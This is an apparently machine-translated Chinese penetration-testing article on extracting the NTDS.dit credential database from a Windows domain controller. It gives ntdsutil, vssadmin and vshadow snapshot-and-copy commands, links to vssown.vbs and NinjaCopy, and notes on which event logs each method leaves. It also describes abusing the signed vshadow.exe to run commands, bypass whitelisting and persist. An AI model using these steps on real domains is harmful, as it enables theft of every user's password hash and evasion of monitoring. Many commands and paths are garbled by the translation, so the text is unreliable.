域渗透——获得域控服务器的NTDS.dit文件

0x00 前言

在之前的文章《导出当前域内所有用户hash的技术整理》 曾介绍过通过卷影副本实现对ntds.dit文件的复制，可用来导出域内所有用户哈希。本文将尝试做系统总结，总结多种不同的方法。

0x01 简介

本文将要介绍以下内容：

多种实现方法

比较优缺点

0x02 通过Volume Shadow Copy获得域控服务器NTDS.dit文件

测试系统：

服务器2008 R2 x64

服务器2012款R2 x64

Volume Shadow Copy Service：

用于数据备份

支持Windows Server 2003及以上操作系统

系统默认在特定条件下自动创建数据备份，如补丁安装后。在Win7系统大概每隔一周自动创建备份，该时间无法确定

禁用虚存系统会影响系统正常使用，如系统还原和Windows服务器备份

1、ntdsutil

域环境默认安装

支持系统：

服务器2003

服务器2008

服务器2012

…

常用命令：

(1) 查询当前快照列表

ntdsutil快照'全部列出'退出退出

(2) 查询已挂载的快照列表

ntdsutil快照'列表已安装'退出退出

(3) 创建快照

ntdsutil快照'激活实例' ntds '创建退出退出

(4) 挂载快照

ntdsutil快照'装载GUID退出退出

(5) 卸载快照：

ntdsutil快照'卸载GUID退出退出

(6) 删除快照

ntdsutil快照'删除GUID退出退出

实际测试：

(1) 查询当前系统的快照

ntdsutil快照'全部列出'退出退出

ntdsutil快照'列表已安装'退出退出

(2) 创建快照

ntdsutil快照'激活实例' ntds '创建退出退出

全局唯一标识符为{ 6e 31 c0a b-c517-420 b-845d-c 38 acbf 77 ab 9 }

如下图

(3) 挂载快照

ntdsutil快照安装{ 6e 31 c0 a b-c517-420 b-845d-c 38 acbf 77 ab 9 } '退出退出

快照挂载为c:\ $ SNAP _ 201802270645 _ VOLUMEC $ \，如下图

(4) 复制ntds.dit

复制c:\ $ SNAP _ 201802270645 _ VOLUMEC $ \ windows \ NTDS \ NTDs。dit C:\ NTDs。摩尔斯讯号的短音

(5) 卸载快照：

ntdsutil快照'卸载{ 6e 31 c0 a b-c517-420 b-845d-c 38 acbf 77 ab 9 } '退出退出

(6) 删除快照

ntdsutil快照'删除{ 6e 31 c0 a b-c517-420 b-845d-c 38 acbf 77 ab 9 } '退出退出

2、vssadmin

域环境默认安装

支持系统：

服务器2008

服务器2012

…

常用命令：

(1) 查询当前系统的快照

vssadmin列表阴影

(2) 创建快照

vssadmin创建shadow /for=c:

(3) 删除快照

vssadmin删除阴影/for=c: /quiet

实际测试：

(1) 查询当前系统的快照

vssadmin列表阴影

(2) 创建快照

vssadmin创建shadow /for=c:

获得卷影副本卷名为\\?\全局根\设备\ hardiskvolumeshadowcopy 12

如下图

(3) 复制ntds.dit

复制\\?\全局根\设备\ hardiskvolumeshadowcopy 12 \ windows \ NTDS \ NTDs。dit c:\ NTDs。摩尔斯讯号的短音

(4) 删除快照

vssadmin删除阴影/for=c: /quiet

3、vshadow.exe

系统默认不支持，可在微软视窗软件软件开发工具包(SDK)中获得该工具

注：

64位系统需要使用64位的vshadow.exe

不同系统可供使用的vshadow.exe下载地址：

http://edgylogic.com/blog/vshadow-exe-versions/

常用命令：

(1) 查询当前系统的快照

vshadow.exe问

(2) 创建快照

vshadow.exe-太平洋-西北丙：

参数说明：

-p持久，备份操作或是重启系统不会删除

-西北没有作家，用来提高创建速度

丙：对应c盘

(3) 删除快照

vshadow -dx=ShadowCopySetId

vshadow -ds=ShadowCopyId

实际测试：

(1) 查询当前系统的快照

vshadow.exe问

(2) 创建快照

vshadow.exe-太平洋-西北丙：

获得快照集身份证明为{ 809 b 77 cc-cf9a-4101-b802-08e 97d 10 e 613 }

获得快照身份证明为{ ef99d 039-9a 38-4e8b-9f 57-e 3113d 464 f 76 }

获得卷影复制设备名称为\\?\全局根\设备\ hardiskvolumeshadowcopy 10

如下图

(3) 复制ntds.dit

复制\\?\全局根\设备\ hardiskvolumeshadowcopy 10 \ windows \ NTDS \ NTDs。dit c:\ NTDs。摩尔斯讯号的短音

(4) 删除快照

vshadow-dx={ 809 b 77 cc-cf9a-4101-b802-08e 97d 10 e 613 }

或者

vshadow-ds={ ef99d 039-9a 38-4e8b-9f 57-e 3113d 464 f 76 }

4、vssown.vbs

可供参考的下载地址：

https://生的。githubusercontent。com/bori gue/pt脚本/master/windows/vs sow。VBS

本质上是通过wmi对阴影复制进行操作

通过wmi查询快照信息：

wmic/NAMESPACE:“\ \ root \ CIM v2”路径Win32 _ shadow copy GET device object，ID，InstallDate /FORMAT:list

Powershell实现：

https://github . com/samratashok/nishang/blob/master/Gather/Copy-VSS . PS1

扩展

1、日志文件

调用卷影复制服务将生成一个日志文件，该文件位于系统下，事件ID为7036。

执行ntdsutil快照“激活实例NTDs”create quit quit将生成一个事件ID为98的附加日志文件。

如下图

2、访问快照中的文件

查看快照列表：

vssadmin列表阴影

不能直接访问\ \？\ global root \ device \ hardiskvolumeshadowcopy 12中的文件

您可以通过创建符号链接来访问快照中的文件：

mklink /d c:\testvsc \\？\ global root \ Device \ hardiskvolumeshadowcopy 12 \

如下图

删除符号链接：

rd c:\testvsc

使用创意：

如果当前系统中有快照文件，您可以访问系统的历史文件。

3、利用vshadow执行命令

参考资料：

https://boho PS . com/2018/02/10/vshadow-滥用卷影服务用于规避-持久性和活动目录-数据库-提取/

执行命令：

vshadow.exe-NW-exec=c:\ windows \ system32 \ notepad . exe c:

执行后，进程VSSVC.exe在后台存在，服务卷影副本正在运行，因此需要手动关闭进程VSSVC.exe。

注：

手动关闭进程VSSVC.exe将生成日志7034。

使用创意：

包括vshadow.exe的签名，可以绕过一些白名单限制。如果是启动项目，则不会显示自动运行的默认启动列表。

0x03 通过NinjaCopy获得域控服务器NTDS.dit文件

下载地址：

https://github . com/powershell mafia/PowerSploit/blob/master/exfiliation/Invoke-ninjacopy . PS1

没有调用卷影复制服务，因此不会生成日志文件7036。

0x04 小结

本文整理了几种获取域控制服务器NTDS.dit文件的方法，并对使用环境进行了测试，比较了优缺点。

留下回复